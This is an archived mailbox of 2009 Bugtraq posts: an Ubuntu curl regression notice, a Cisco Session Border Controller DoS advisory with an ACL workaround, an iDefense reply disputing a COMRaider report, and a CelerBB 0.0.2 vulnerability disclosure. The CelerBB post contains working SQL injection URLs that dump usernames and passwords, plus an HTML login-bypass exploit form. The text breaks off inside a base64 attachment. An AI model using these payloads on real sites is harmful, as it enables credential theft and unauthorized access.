===========================================================
Ubuntu Security Notice USN-726-2 March 04, 2009
curl regression
https://launchpad.net/bugs/337501
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 8.10
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 8.10:
libcurl3 7.18.2-1ubuntu4.3
libcurl3-gnutls 7.18.2-1ubuntu4.3
In general, a standard system upgrade is sufficient to effect the
necessary changes.
Details follow:
USN-726-1 fixed a vulnerability in curl. Due to an incomplete fix, a regression
was introduced in Ubuntu 8.10 that caused certain types of URLs to fail. This
update fixes the problem. We apologize for the inconvenience.
Original advisory details:
It was discovered that curl did not enforce any restrictions when following
URL redirects. If a user or automated system were tricked into opening a URL to
an untrusted server, an attacker could use redirects to gain access to abitrary
files. This update changes curl behavior to prevent following "file" URLs after
a redirect.
Updated packages for Ubuntu 8.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.18.2-1ubuntu4.3.diff.gz
Size/MD5: 22444 f03a34d199a3dfe6862d4f93b6704e10
http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.18.2-1ubuntu4.3.dsc
Size/MD5: 1491 906af0232a5e1c0a02e921eb508eff57
http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.18.2.orig.tar.gz
Size/MD5: 2273077 4fe99398a64a34613c9db7bd61bf6e3c
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.18.2-1ubuntu4.3_amd64.deb
Size/MD5: 210392 605f35f7ab21dc4ed16205f73f5ce335
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-dbg_7.18.2-1ubuntu4.3_amd64.deb
Size/MD5: 1124818 52b6531b8d0ba56e47844b90faaa7d88
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls_7.18.2-1ubuntu4.3_amd64.deb
Size/MD5: 216220 700b648d0e4b4346da9dd4ba9421962f
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3_7.18.2-1ubuntu4.3_amd64.deb
Size/MD5: 223312 58580fc77cdd1a93439ee92875aee1fc
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-gnutls-dev_7.18.2-1ubuntu4.3_amd64.deb
Size/MD5: 926208 16822154e80a941fd4305169d7979379
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-openssl-dev_7.18.2-1ubuntu4.3_amd64.deb
Size/MD5: 933192 ae5cc0e338e4f2d9f43ceac6c92303f0
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.18.2-1ubuntu4.3_i386.deb
Size/MD5: 209182 e34d8187746e820d6328fdc4540e7e73
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-dbg_7.18.2-1ubuntu4.3_i386.deb
Size/MD5: 1092044 3d9e9bf04f0dd77c09ff967ce0822011
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls_7.18.2-1ubuntu4.3_i386.deb
Size/MD5: 212674 bdad3624169c184cdee7153dfdc61a16
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3_7.18.2-1ubuntu4.3_i386.deb
Size/MD5: 219586 e9b3008f8cb5047b326b4d3f1f6e0323
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-gnutls-dev_7.18.2-1ubuntu4.3_i386.deb
Size/MD5: 899702 6dd63d112bdc8055636b2c8edfdd24a2
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-openssl-dev_7.18.2-1ubuntu4.3_i386.deb
Size/MD5: 905420 ff0b8f23fd90555ffe215698ac644cdf
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/c/curl/curl_7.18.2-1ubuntu4.3_lpia.deb
Size/MD5: 208850 1c452ad9122b12518bf1b5c8b3996c3b
http://ports.ubuntu.com/pool/main/c/curl/libcurl3-dbg_7.18.2-1ubuntu4.3_lpia.deb
Size/MD5: 1099132 7735bb7e7c240be1a5f9ee749a67eb6e
http://ports.ubuntu.com/pool/main/c/curl/libcurl3-gnutls_7.18.2-1ubuntu4.3_lpia.deb
Size/MD5: 210934 5f3eea9bf9eece8f91200332c6f41b6a
http://ports.ubuntu.com/pool/main/c/curl/libcurl3_7.18.2-1ubuntu4.3_lpia.deb
Size/MD5: 217456 eebef9ad6914c70cb38b0fa08875233c
http://ports.ubuntu.com/pool/main/c/curl/libcurl4-gnutls-dev_7.18.2-1ubuntu4.3_lpia.deb
Size/MD5: 898570 21805c5b24e9477670aad07d167d56ab
http://ports.ubuntu.com/pool/main/c/curl/libcurl4-openssl-dev_7.18.2-1ubuntu4.3_lpia.deb
Size/MD5: 903918 90628d272b4301c968ef5cf446c778fe
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/c/curl/curl_7.18.2-1ubuntu4.3_powerpc.deb
Size/MD5: 212598 4003e25fccb2f67b75f451e60d7e9362
http://ports.ubuntu.com/pool/main/c/curl/libcurl3-dbg_7.18.2-1ubuntu4.3_powerpc.deb
Size/MD5: 1130394 f755328b6c0df8b6963ea39255594cfb
http://ports.ubuntu.com/pool/main/c/curl/libcurl3-gnutls_7.18.2-1ubuntu4.3_powerpc.deb
Size/MD5: 223766 b72e7008472791b08bba97fc57857f1b
http://ports.ubuntu.com/pool/main/c/curl/libcurl3_7.18.2-1ubuntu4.3_powerpc.deb
Size/MD5: 229632 d891ef64864441ba7f2496c29b57d49a
http://ports.ubuntu.com/pool/main/c/curl/libcurl4-gnutls-dev_7.18.2-1ubuntu4.3_powerpc.deb
Size/MD5: 925530 35c2284ab719cb773592ea4bc8679af6
http://ports.ubuntu.com/pool/main/c/curl/libcurl4-openssl-dev_7.18.2-1ubuntu4.3_powerpc.deb
Size/MD5: 931828 f29cf3a604d660801e1b011fa409af90
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/c/curl/curl_7.18.2-1ubuntu4.3_sparc.deb
Size/MD5: 209654 b25b0908a500fb1c6ba5e9af876249ac
http://ports.ubuntu.com/pool/main/c/curl/libcurl3-dbg_7.18.2-1ubuntu4.3_sparc.deb
Size/MD5: 1072608 7c3c67a9fcd09e1807a22d6ba110790e
http://ports.ubuntu.com/pool/main/c/curl/libcurl3-gnutls_7.18.2-1ubuntu4.3_sparc.deb
Size/MD5: 209368 cb36362b891401548905671dee5057db
http://ports.ubuntu.com/pool/main/c/curl/libcurl3_7.18.2-1ubuntu4.3_sparc.deb
Size/MD5: 214076 49e05a9531109bcc7cbbce75adb29681
http://ports.ubuntu.com/pool/main/c/curl/libcurl4-gnutls-dev_7.18.2-1ubuntu4.3_sparc.deb
Size/MD5: 904932 56300cb1c407a1b90d23b72a22df0b56
http://ports.ubuntu.com/pool/main/c/curl/libcurl4-openssl-dev_7.18.2-1ubuntu4.3_sparc.deb
Size/MD5: 909964 92dc9ddcf638da3dcac80c7f90373b10
--=-L93ZgGm9Fd8arsfym5E/
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: This is a digitally signed message part
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iEYEABECAAYFAkmumZ0ACgkQLMAs/0C4zNqLnACfYoK+AWvyF7aVelAWlDfZW/oe
M9YAmgPpu3yeIi5GwBbCjW9JDwNnXVH9
=hsho
-----END PGP SIGNATURE-----
--=-L93ZgGm9Fd8arsfym5E/--
From - Wed Mar 4 13:01:10 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000066b2
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39632-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id F09E1EE320
for <lists@securityspace.com>; Wed, 4 Mar 2009 12:53:57 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 36153143B20; Wed, 4 Mar 2009 10:14:10 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 11634 invoked from network); 4 Mar 2009 16:10:56 -0000
X-TACSUNS: Virus Scanned
Sender: nobody@cisco.com
From: Cisco Systems Product Security Incident Response Team <psirt@cisco.com>
To: bugtraq@securityfocus.com
Cc: psirt@cisco.com
Subject: Cisco Security Advisory: Cisco 7600 Series Router Session Border Controller Denial of Service Vulnerability
Date: Wed, 04 Mar 2009 17:30:00 +0100
Message-id: <200903041732.sbc@psirt.cisco.com>
Reply-To: psirt@cisco.com
Errors-To: nobody@cisco.com
MIME-Version: 1.0
Content-Type: Text/Plain; charset="us-ascii"
Content-Transfer-Encoding: 8bit
Prevent-NonDelivery-Report:
Content-Return: Prohibited
Status:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Cisco Security Advisory: Cisco 7600 Series Router Session Border
Controller Denial of Service Vulnerability
Document ID: 109483
Advisory ID: cisco-sa-20090304-sbc
http://www.cisco.com/warp/public/707/cisco-sa-20090304-sbc.shtml
Revision 1.0
For Public Release 2009 March 4 1600 UTC (GMT)
- ---------------------------------------------------------------------
Summary
======
A denial of service (DoS) vulnerability exists in the Cisco Session
Border Controller (SBC) for the Cisco 7600 series routers. Cisco has
released free software updates that address this vulnerability.
Workarounds that mitigate this vulnerability are available.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20090304-sbc.shtml
Affected Products
================
Vulnerable Products
+------------------
All Cisco ACE-based SBC modules running software versions prior to
3.0(2) are affected.
To determine the version of the Cisco SBC software running on a
system, log in to the device and issue the show version command to
display the system banner.
card_A/Admin# show version
system image file: [LCP] disk0:c76-sbck9-mzg.3.0.1_AS3_0_00.bin
<output truncated>
Cisco SBC software version 3.0.1 is running in the device used in
this example.
Products Confirmed Not Vulnerable
+--------------------------------
The Cisco XR 12000 Series SBC is not vulnerable. Additionally, the
Cisco ACE Module, Cisco ACE 4710 Application Control Engine, Cisco
ACE XML Gateway, Cisco ACE Web Application Firewall, and the Cisco
ACE GSS (Global Site Selector) 4400 Series are not affected by this
vulnerability. No other Cisco products are currently known to be
affected by this vulnerability.
Details
======
The Session Border Controller (SBC) enables direct IP-to-IP
interconnect between multiple administrative domains for
session-based services providing protocol interworking, security, and
admission control and management. The SBC is a multimedia device that
sits on the border of a network and controls call admission to that
network. A vulnerability exists in the Cisco SBC where an
unauthenticated attacker may cause the Cisco SBC card to reload by
sending crafted TCP packets over port 2000. Repeated exploitation
could result in a sustained DoS condition.
Note: Only the Cisco SBC module reloads after successful
exploitation. The Cisco 7600 series router does not reload and it is
not affected by this vulnerability.
Note: TCP port 2000 is typically used by Skinny Call Control Protocol
(SCCP) applications. However, the Cisco SBC module uses TCP port 2000
for high availability (redundancy) communication, but does not use
the SCCP for this purpose.
This vulnerability is documented in Cisco Bug IDs CSCsq18958 (
registered customers only) ; and has been assigned the Common
Vulnerability and Exposures (CVE) IDs CVE-2009-0619.
Vulnerability Scoring Details
============================
Cisco has provided scores for the vulnerability in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
=====
Successful exploitation of the vulnerability may cause a reload of
the affected device. Repeated exploitation could result in a
sustained DoS condition.
Software Versions and Fixes
==========================
This vulnerability has been corrected in Cisco SBC software release
3.0(2).
Cisco SBC software can be downloaded from:
http://www.cisco.com/pcgi-bin/tablebuild.pl/sbc-7600-crypto
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Workarounds
==========
As a workaround, configure an access control list (ACL) in the
signaling / media VLAN on the Route Processor (RP). The following
examples show how VLAN 140 is configured as the signaling / media
VLAN. A separate VLAN (VLAN 77) is configured as Fault Tolerance
(FT). An ACL is added to the signaling/media VLAN on the RP filtering
all TCP port 2000 packets to the alias IP address.
Cisco SBC configuration
interface vlan 140
ip address 10.140.1.90 255.255.255.0
alias 10.140.1.100 255.255.255.0
peer ip address 10.140.1.8 255.255.255.0
!
ft interface vlan 77
ip address 192.168.1.1 255.255.255.0
peer ip address 192.168.1. 255.255.255.0
RP Configuration
!- ACL blocking all TCP port 2000 traffic to the 10.140.1.0 internal network
!
access-list 100 deny tcp any host 10.140.1.100 eq 2000
access-list 100 permit ip any any
!
interface Vlan140
ip address 10.140.1.1 255.255.255.0
!- ACL is applied to the VLAN interface to egress traffic
ip access-group 100 out
!
The alias command under VLAN 140 is configured with an IP address
that floats between active and standby modules when using high
availability. Only TCP port 2000 traffic destined to this IP address
may trigger this vulnerability. An access control list (ACL) is
configured to deny TCP port 2000 destined to the alias IP address
(10.140.1.100). The ACL is applied egress in the RP.
Note: TCP port 2000 is used by Skinny Call Control Protocol (SCCP)
applications; however, in this case it is used by the SBC for
internal communications. The previous ACL only blocks TCP port 2000
traffic to the alias IP address. TCP port 2000 is not used by the
alias IP address. This ACL should not cause any collateral damage.
Additional mitigations that can be deployed on Cisco devices within
the network are available in the Cisco Applied Intelligence companion
document for this Advisory:
http://www.cisco.com/warp/public/707/cisco-amb-20090304-sbc.shtml
Obtaining Fixed Software
=======================
Cisco has released free software updates that address this
vulnerability. Prior to deploying software, customers should consult
their maintenance provider or check the software for feature set
compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at
http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to
http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.
This vulnerability was found during internal testing.
Status of this Notice: FINAL
===========================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
===========
This advisory is posted on Cisco's worldwide website at :
http://www.cisco.com/warp/public/707/cisco-sa-20090304-sbc.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
===============
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2009-March-04 | public |
| | | release |
+---------------------------------------+
Cisco Security Procedures
========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco
security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (Darwin)
iEYEARECAAYFAkmurgEACgkQ86n/Gc8U/uBrwwCfbQxCcSz4S4X3UpH4Mccg0Df1
KMoAn11BqKmRhw5mUuJOl3D/RrVxVrc7
=m2di
-----END PGP SIGNATURE-----
From - Thu Mar 5 11:01:11 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000066d0
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39633-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id B2A85EE175
for <lists@securityspace.com>; Thu, 5 Mar 2009 10:56:31 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 675751437CB; Thu, 5 Mar 2009 08:29:04 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 29616 invoked from network); 4 Mar 2009 21:10:12 -0000
Message-ID: <49AEF5DA.60207@idefense.com>
Date: Wed, 04 Mar 2009 15:42:50 -0600
From: iDefense Labs <labs-no-reply@idefense.com>
User-Agent: Thunderbird 2.0.0.19 (Windows/20081209)
MIME-Version: 1.0
To: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: Re: iDefense COMRaider 'DeleteFile()' Method Arbitrary File Deletion
Vulnerability
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Status:
Amir, et al,
We would not classify this issue as a security vulnerability. The COM
object in question is *NOT* loadable in Internet Explorer in a default
configuration.
CLSID: {9A077D0D-B4A6-4EC0-B6CF-98526DF589E4}
ProgId: vbDevKit.CVariantFileSystem
Path to binary: C:\WINDOWS\vbDevKit.dll
Doesn't implement IObjectSafety
Registry settings:
Registry: is not safe for initialization
Registry: is not safe for scripting
Killbit is NOT set
In order to load this control, the particular security setting that
would need to be modified is "Initialize and script ActiveX controls not
marked as safe for scripting". Changing this particular setting to
"Enable", or even "Prompt", significantly impacts the browser's overall
security posture.
In short, if your machine allows this control to be loaded, then your
browser will load controls regardless of safety designations such as
"Safe for Scripting", "Safe for Initialization", and "IObjectSaftey".
This includes the ability to load controls such as WScript, which can
execute arbitrary commands out of the box.
iDefense Labs
From - Thu Mar 5 11:11:10 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000066d1
X-Mozilla-Status: 0001
X-Mozilla-Status2: 10000000
Return-Path: <bugtraq-return-39636-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 47CFFEE176
for <lists@securityspace.com>; Thu, 5 Mar 2009 11:01:45 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 57B711439BB; Thu, 5 Mar 2009 08:42:59 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 23358 invoked from network); 5 Mar 2009 14:04:59 -0000
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
d=gmail.com; s=gamma;
h=domainkey-signature:mime-version:received:date:message-id:subject
:from:to:content-type;
bh=IJBrvNY9ooHgL49nccQ2weFRVxiL5lbiDdYkH/kXO20=;
b=GeuSpm+nAQhnoKMPINJgFzinMCz4/KWN6LpmsiyqyznpeGR2NuG7WWIW2pY14KCaLj
WEH0LMpEaFRbNoTtsE1bSM5nyNkgiE6vO4zq64Dl3bK3uFe/Q6stqrqyVkZKJ5Fu429q
oi4i+BGnKRVz3TiPO4sCAOytT2/axNxDnjpI8DomainKey-Signature: a=rsa-sha1; c=nofws;
d=gmail.com; s=gamma;
h=mime-version:date:message-id:subject:from:to:content-type;
b=pmfMIxB65QxBrdhP6GUAZdFPIq+opOy+jtJcX7opawitpEAc+BiTpRaqR/6u37B/OJ
TGBqlLj4PACrEd5qjXYNIiUjoz/VyUokDor1c0riLlgGyOYye43BvfCdPRujMjwDSo6l
h7//2aaJWcEfIUMxnuxIh3KnO7cyeaTaU0sw4MIME-Version: 1.0
Date: Thu, 5 Mar 2009 15:37:49 +0100
Message-ID: <48317b000903050637r5694f1f7q7f81acdc592c7629@mail.gmail.com>
Subject: CelerBB 0.0.2 Multiple Vulnerabilities
From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@gmail.com>
To: Bugtraq <bugtraq@securityfocus.com>, str0ke <str0ke@milw0rm.com>
Content-Type: multipart/mixed; boundary 1636c59672d0b3940464601c3f
Status:
--001636c59672d0b3940464601c3f
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit
******* Salvatore "drosophila" Fresta *******
[+] Application: CelerBB
[+] Version: 0.0.2
[+] Website:
http://celerbb.sourceforge.net/
[+] Bugs: [A] Multiple SQL Injection
[B] Information Disclosure
[C] Authenticaion Bypass
[+] Exploitation: Remote
[+] Date: 05 Mar 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com
*************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
*************************************************
[+] Bugs
- [A] Multiple SQL Injection
[-] Requisites: magic_quotes_gpc = off
[-] File affected: viewforum.php, viewtopic.php
This bug allows a guest to view username and
password list.
- [B] Information Disclosure
[-] Requisites: none
[-] File affected: showme.php
This bug allows a guest to view reserved
information of any user.
- [C] Authentication Bypass
[-] Requisites: magic_quotes_gpc = off
[-] File affected: login.php
This bug allows a guest to bypass authentication.
*************************************************
[+] Code
- [A] Multiple SQL Injection
http://www.site.com/path/viewforum.php?id=-1' UNION ALL SELECT
1,2,GROUP_CONCAT(CONCAT(username, 0x3a, password)),4,5,6,7,8 FROM
celer_users%23
http://www.site.com/path/viewtopic.php?id=1' UNION ALL SELECT
1,2,3,NULL,5,6,GROUP_CONCAT(CONCAT(username, 0x3a, password)),NULL
FROM celer_users%23
- [B] Information Disclosure
http://www.site.com/path/showme.php?user�min
- [C] Authentication Bypass
<html>
<head>
<title>CelerBB 0.0.2 Authentication Bypass Exploit</title>
</head>
<body>
<form action="login.php" method="POST">
<input type="hidden" name="Username" value="admin'#">
<input type="submit" value="Exploit">
</form>
</body>
</html>
*************************************************
[+] Fix
No fix.
*************************************************
--
Salvatore "drosophila" Fresta
CWNP444351
--001636c59672d0b3940464601c3f
Content-Type: text/plain; charset=US-ASCII;
name="CelerBB 0.0.2 Multiple Vulnerabilities-05032009.txt"
Content-Disposition: attachment;
filename="CelerBB 0.0.2 Multiple Vulnerabilities-05032009.txt"
Content-Transfer-Encoding: base64
X-Attachment-Id: f_frxjjqnq0
KioqKioqKiAgIFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhICAgKioqKioqKgoKWytdIEFw
cGxpY2F0aW9uOiBDZWxlckJCClsrXSBWZXJzaW9uOiAwLjAuMgpbK10gV2Vic2l0ZTogaHR0cDov
L2NlbGVyYmIuc291cmNlZm9yZ2UubmV0LwoKWytdIEJ1Z3M6IFtBXSBNdWx0aXBsZSBTUUwgSW5q
ZWN0aW9uCiAgICAgICAgICBbQl0gSW5mb3JtYXRpb24gRGlzY2xvc3VyZQogICAgICAgICAgW0Nd
IEF1dGhlbnRpY2Fpb24gQnlwYXNzCgpbK10gRXhwbG9pdGF0aW9uOiBSZW1vdGUKWytdIERhdGU6
IDA1IE1hciAyMDA5CgpbK10gRGlzY292ZXJlZCBieTogU2FsdmF0b3JlICJkcm9zb3BoaWxhIiBG
cmVzdGEKWytdIEF1dGhvcjogU2FsdmF0b3JlICJkcm9zb3BoaWxhIiBGcmVzdGEKWytdIENvbnRh
Y3Q6IGUtbWFpbDogZHJvc29waGlsYXh4eEBnbWFpbC5jb20KCgoqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqCgpbK10gTWVudQoKMSkgQnVncwoyKSBDb2Rl
CjMpIEZpeAoKCioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioKClsrXSBCdWdzCgoKLSBbQV0gTXVsdGlwbGUgU1FMIEluamVjdGlvbgoKWy1dIFJlcXVpc2l0
ZXM6IG1hZ2ljX3F1b3Rlc19ncGMgPSBvZmYKWy1dIEZpbGUgYWZmZWN0ZWQ6IHZpZXdmb3J1bS5w
aHAsIHZpZXd0b3BpYy5waHAKClRoaXMgYnVnIGFsbG93cyBhIGd1ZXN0IHRvIHZpZXcgdXNlcm5h
bWUgYW5kCnBhc3N3b3JkIGxpc3QuCgoKLSBbQl0gSW5mb3JtYXRpb24gRGlzY2xvc3VyZQoKWy1d
IFJlcXVpc2l0ZXM6IG5vbmUKWy1dIEZpbGUgYWZmZWN0ZWQ6IHNob3dtZS5waHAKClRoaXMgYnVn
IGFsbG93cyBhIGd1ZXN0IHRvIHZpZXcgcmVzZXJ2ZWQKaW5mb3JtYXRpb24gb2YgYW55IHVzZXIu
CgoKLSBbQ10gQXV0aGVudGljYXRpb24gQnlwYXNzCgpbLV0gUmVxdWlzaXRlczogbWFnaWNfcXVv
dGVzX2dwYyA9IG9mZgpbLV0gRmlsZSBhZmZlY3RlZDogbG9naW4ucGhwCgpUaGlzIGJ1ZyBhbGxv
d3MgYSBndWVzdCB0byBieXBhc3MgYXV0aGVudGljYXRpb24uCgoKKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKgoKWytdIENvZGUKCgotIFtBXSBNdWx0aXBs
ZSBTUUwgSW5qZWN0aW9uCgpodHRwOi8vd3d3LnNpdGUuY29tL3BhdGgvdmlld2ZvcnVtLnBocD9p
ZD0tMScgVU5JT04gQUxMIFNFTEVDVCAxLDIsR1JPVVBfQ09OQ0FUKENPTkNBVCh1c2VybmFtZSwg
MHgzYSwgcGFzc3dvcmQpKSw0LDUsNiw3LDggRlJPTSBjZWxlcl91c2VycyUyMwoKaHR0cDovL3d3
dy5zaXRlLmNvbS9wYXRoL3ZpZXd0b3BpYy5waHA/aWQ9MScgVU5JT04gQUxMIFNFTEVDVCAxLDIs
